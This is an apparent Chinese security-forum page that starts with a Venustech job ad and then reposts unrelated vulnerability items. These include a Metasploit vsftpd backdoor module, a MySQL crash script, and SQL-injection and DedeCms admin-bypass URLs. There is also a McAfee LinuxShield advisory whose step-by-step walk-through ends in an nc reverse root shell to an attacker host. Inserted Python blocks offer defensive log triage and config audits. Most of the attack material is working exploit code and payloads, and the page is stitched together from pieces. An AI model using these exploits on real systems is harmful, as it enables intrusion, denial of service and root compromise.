
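[Recruitment] [Hiring] Venustech R&D Hiring

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • Online QQ:
  • Security assistant: recruiting/job-seeking through Non-Security China (非安全中国) administrators, QQ group: 57116771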


  • ++++++++++ Notes about Venustech ++++++++++

    Just send me a site message.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Development and maintenance of software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming
    2. Skilled with the Linux operating system; proficient in C programming on Linux
    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis
    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls
    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. System testing and integration testing of products
    2. Writing, executing and revising product test cases
    3. Product performance testing
    4. Support and testing for external projects

    Requirements:

    1. Basic knowledge of TCP/IP
    2. Solid data-communications fundamentals
    3. Some Linux background
    4. Able to set up and use databases
    5. Familiar with at least one programming language: C/Perl/VBS/TCL
    6. Familiar with test case design, system testing and stress testing
    7. Familiar with firewall principles, with some understanding of firewall features
    8. Some understanding of how network security devices are deployed in a network
    9. Able to use test tools: Loadrunner, packet analysis software, Spirent or IXIA testers

    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Delivery of Trojan detection services and web vulnerability scanning services
    2. Technical support for service customers
    3. Research on web Trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and so on
    4. Routine updating and maintenance of the security event libraries of IDS/IPS/UTM/TDS/WAG/322 and other products
    5. Research on attack techniques; research on the TCP/IP protocols; research on reverse engineering

     


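    Non-Security China (非安全中国网) disclaimer: 1. All statements and images in this post are solely the personal opinions of the poster and do not represent the position of this site;
    2. This topic was posted by 小妍 (Xiaoyan); the poster complies with the six management rules of the "Copyright and Disclaimer Statement" and enjoys the corresponding rights;
    3. Other organizations or individuals must obtain the consent of the poster 小妍 and of this site before using, reposting or quoting this post;
    4. Parts of this post are reposted from other media and published on this site in order to pass on more information; this does not mean that the site endorses the views expressed or is responsible for their accuracy;
    5. If this post infringes your site's or your personal copyright, please notify this site immediately; the site will delete it promptly and offers its sincerest apologies;
    6. Site administrators and moderators have the right to delete this post without notifying the poster in advance.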

    VSFTPD v2.3.4 Backdoor Command Execution Vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5' ],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end

    Notice: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.
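Added example, not part of the original post or of Metasploit: a log triage for the two observable steps the module above performs, a USER name carrying ":)" and a connection to TCP port 6200. The vsftpd protocol-log layout, the iptables-style LOG layout and every sample line are constructed assumptions.

```python
import re

# Assumed vsftpd protocol-log layout (log_ftp_protocol=YES).
FTP_USER = re.compile(r'FTP command: Client "(?P<ip>[^"]+)", "USER (?P<user>[^"]*)"')
# Assumed iptables-style LOG layout; only SRC= and DPT= are used.
FW_CONN = re.compile(r'\bSRC=(?P<ip>\S+).*\bDPT=(?P<dport>\d+)')

BACKDOOR_PORT = 6200   # port the module on this page connects to after the login attempt
TRIGGER = ":)"         # sequence the module appends to the USER name; matched anywhere in the name

# Constructed sample data.
FTP_LOG = [
    'Tue Jul  5 09:14:01 2011 [pid 2] FTP command: Client "::ffff:203.0.113.7", "USER kq3:)"',
    'Tue Jul  5 09:14:01 2011 [pid 2] FTP command: Client "::ffff:203.0.113.7", "PASS <password>"',
    'Tue Jul  5 09:20:44 2011 [pid 2] FTP command: Client "::ffff:198.51.100.20", "USER backup"',
    'Tue Jul  5 09:31:09 2011 [pid 2] FTP command: Client "::ffff:192.0.2.55", "USER a:)b"',
]
FW_LOG = [
    'Jul  5 09:14:02 ftp1 kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=51514 DPT=6200 SYN',
    'Jul  5 09:20:45 ftp1 kernel: IN=eth0 OUT= SRC=198.51.100.20 DST=192.0.2.10 PROTO=TCP SPT=40112 DPT=21 SYN',
    'Jul  5 10:02:30 ftp1 kernel: IN=eth0 OUT= SRC=198.51.100.99 DST=192.0.2.10 PROTO=TCP SPT=40200 DPT=6200 SYN',
]


def smiley_logins(ftp_lines):
    """Return {client_ip: [usernames]} for USER commands that contain the trigger."""
    hits = {}
    for line in ftp_lines:
        m = FTP_USER.search(line)
        if m and TRIGGER in m.group("user"):
            ip = m.group("ip").replace("::ffff:", "")  # normalise IPv4-mapped addresses
            hits.setdefault(ip, []).append(m.group("user"))
    return hits


def backdoor_port_sources(fw_lines, port=BACKDOOR_PORT):
    """Return the set of source IPs seen connecting to the backdoor port."""
    sources = set()
    for line in fw_lines:
        m = FW_CONN.search(line)
        if m and int(m.group("dport")) == port:
            sources.add(m.group("ip"))
    return sources


def triage(ftp_lines, fw_lines):
    """Correlate both signals per source IP; both together is the strongest indicator."""
    logins = smiley_logins(ftp_lines)
    port_hits = backdoor_port_sources(fw_lines)
    report = {}
    for ip in set(logins) | port_hits:
        if ip in logins and ip in port_hits:
            report[ip] = "trigger+connect"
        elif ip in logins:
            report[ip] = "trigger-only"
        else:
            # The module also tries port 6200 directly when it is already open.
            report[ip] = "port-6200-only"
    return report


if __name__ == "__main__":
    for ip, verdict in sorted(triage(FTP_LOG, FW_LOG).items()):
        print(ip, verdict)
```
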

    WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability

    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

    MySQL 5.5.8 Remote Denial of Service Vulnerability

    # Python 2 syntax (print statements), as posted
    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    # First packet sent after connecting
    buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    # Second packet
    buf2=("\x11\x00\x00\x00\x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"


    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "\n[*] Connect"
        s.send(buf)
        print "\n[*] Payload 1 sent"
        s.send(buf2)
        print "\n[*] Payload 2 sent\n", "\n[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()

    Step-by-step Linux installation: setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf

    DedeCms (织梦) v5.6-5.7 Unauthorized Access Vulnerability

    http://www.XXXX.com/<DedeCms admin directory>/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current CAPTCHA code and you go straight into the site's admin back end.

    This vulnerability can only be used if the admin back-end path is known.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
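Added example, not DedeCms code and not part of the original post: a Python model of the two filters above, showing why the top-level loop lets a nested name such as `_POST[GLOBALS][cfg_dbhost]` through while the recursive `CheckRequest` rejects it. The bracket parser is a simplified stand-in for how PHP builds `$_REQUEST`, and all parameter values are constructed.

```python
import re
from urllib.parse import parse_qsl

# Same pattern both PHP snippets use: strings starting with cfg_ or GLOBALS.
BLOCKED = re.compile(r'^(cfg_|GLOBALS)')

# Constructed request with the same nesting as the URL in the post.
NESTED = ("dopost=login&userid=admin"
          "&_POST[GLOBALS][cfg_dbhost]=db.example.invalid"
          "&_POST[GLOBALS][cfg_dbuser]=demo")


def php_style_parse(query):
    """Nest bracketed names the way PHP fills $_REQUEST:
    a[b][c]=v becomes {'a': {'b': {'c': 'v'}}}."""
    result = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        m = re.match(r'^([^\[]+)((?:\[[^\]]*\])*)$', raw_key)
        if not m:                                  # malformed brackets: keep the name flat
            result[raw_key] = value
            continue
        path = [m.group(1)] + re.findall(r'\[([^\]]*)\]', m.group(2))
        node = result
        for part in path[:-1]:
            part = part or str(len(node))          # "[]" takes the next index
            if not isinstance(node.get(part), dict):
                node[part] = {}
            node = node[part]
        node[path[-1] or str(len(node))] = value
    return result


def old_filter_allows(request):
    """The original foreach loop: only top-level parameter names are tested."""
    return not any(len(k) > 0 and BLOCKED.match(k) for k in request)


def new_filter_allows(val):
    """Model of CheckRequest(): recurse into arrays, test every key and every scalar value."""
    if isinstance(val, dict):
        return all(new_filter_allows(k) and new_filter_allows(v) for k, v in val.items())
    return not (len(val) > 0 and BLOCKED.match(val))


def compare(query):
    """Return which filter lets the request continue (True = allowed)."""
    request = php_style_parse(query)
    return {"old": old_filter_allows(request), "new": new_filter_allows(request)}


if __name__ == "__main__":
    for q in (NESTED, "cfg_dbhost=x", "page=1&tags[0]=news", "q=cfg_test"):
        print(q, compare(q))
```

Because the recursive version also tests scalar values, a harmless value that merely begins with `cfg_` or `GLOBALS` is rejected as well, as the last sample shows.
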

    Step-by-step Linux installation: setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf

    Multiple Security Vulnerabilities in the Django Development Framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Vulnerability description:

    Django is an open-source web application framework written in Python.
    Django has multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks or cause a denial of service.
    1) When a cache backend is used, there is an error in session handling in django.contrib.sessions that can be exploited to manipulate session information. Successful exploitation requires a known session key and an application that lets the attacker store dictionary-like objects in the cache under a valid session key.
    2) The Django model system includes a field type, URLField, that validates whether the supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it tries to check the supplied URL and resolve it. By default the underlying socket has no timeout, and an attacker can exploit this by sending crafted URLs that consume all server memory, causing a denial of service.
    3) There is an error in handling redirect responses when validating URLs supplied to the "URLField" field type; an attacker can exploit this to have the redirect response point to a "file://" URL and determine whether local files exist on the server.
    4) There is an error in handling the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses; an attacker can exploit this to carry out cache poisoning attacks.

    Details:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/

    McAfee LinuxShield Local/Remote Code Execution Vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local overflow: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our
    anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-
    based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110" LocalVersion="20091209161903" Type="Client"><SiteList Default="1" Name="SomeGUID"><HttpSite Type="repository" Name="EvilRepo" Order="1" Server="<attackerhost>:80" Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.primary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pass nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskType=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
                date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
                2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
                the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory
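Added example, not McAfee code and not part of the original advisory: an audit that flags scan profiles whose executable paths have been redirected the way the walk-through does with `nailsd.profile.ODS_99.scannerPath`. It assumes the profile file holds one `nailsd.profile.<profile>.<key>=<value>` entry per line and that legitimate executable paths sit under `/opt/NAI/LinuxShield`; the sample configuration is constructed.

```python
import posixpath
import re

SCRATCH_DIR = "/opt/McAfee/cma/scratch"   # update download directory named in the advisory
TRUSTED_ROOT = "/opt/NAI/LinuxShield"     # assumption: executable paths belong under the install tree
EXEC_KEYS = {"scannerPath", "enginePath", "engineLibDir"}

# Assumed entry layout: nailsd.profile.<profile>.<key>=<value> (":" also accepted).
ENTRY = re.compile(
    r'^\s*nailsd\.profile\.(?P<profile>[^.\s]+)\.(?P<key>[\w.]+)\s*[:=]\s*(?P<value>\S.*?)\s*$'
)

# Constructed sample; /opt/NAI/LinuxShield/libexec/scanner is a made-up "normal" value.
SAMPLE_CFG = """\
nailsd.profile.ODS_1.scannerPath=/opt/NAI/LinuxShield/libexec/scanner
nailsd.profile.ODS_1.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so
nailsd.profile.ODS_99.quarantineDirectory=/quarantine
nailsd.profile.ODS_7.scannerPath=/opt/NAI/LinuxShield/../../tmp/x
"""


def _under(path, root):
    """True when path is root itself or lies below it."""
    return path == root or path.startswith(root + "/")


def audit_profiles(cfg_text):
    """Return (profile, key, normalised_path, reason) for every suspicious entry."""
    findings = []
    for line in cfg_text.splitlines():
        m = ENTRY.match(line)
        if not m or m.group("key") not in EXEC_KEYS:
            continue
        path = posixpath.normpath(m.group("value"))   # collapse ../ before comparing
        if _under(path, SCRATCH_DIR):
            reason = "points into update scratch directory"
        elif not _under(path, TRUSTED_ROOT):
            reason = "outside install tree"
        else:
            continue
        findings.append((m.group("profile"), m.group("key"), path, reason))
    return findings


if __name__ == "__main__":
    for finding in audit_profiles(SAMPLE_CFG):
        print(finding)
```
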
